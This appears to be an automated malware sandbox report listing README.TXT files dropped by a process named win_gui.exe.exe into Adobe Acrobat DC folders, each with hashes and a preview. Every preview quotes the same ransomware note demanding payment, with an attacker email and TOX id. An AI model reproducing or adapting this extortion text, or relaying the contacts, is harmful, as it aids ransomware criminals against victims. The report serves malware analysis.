                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\private\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\app\dev\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
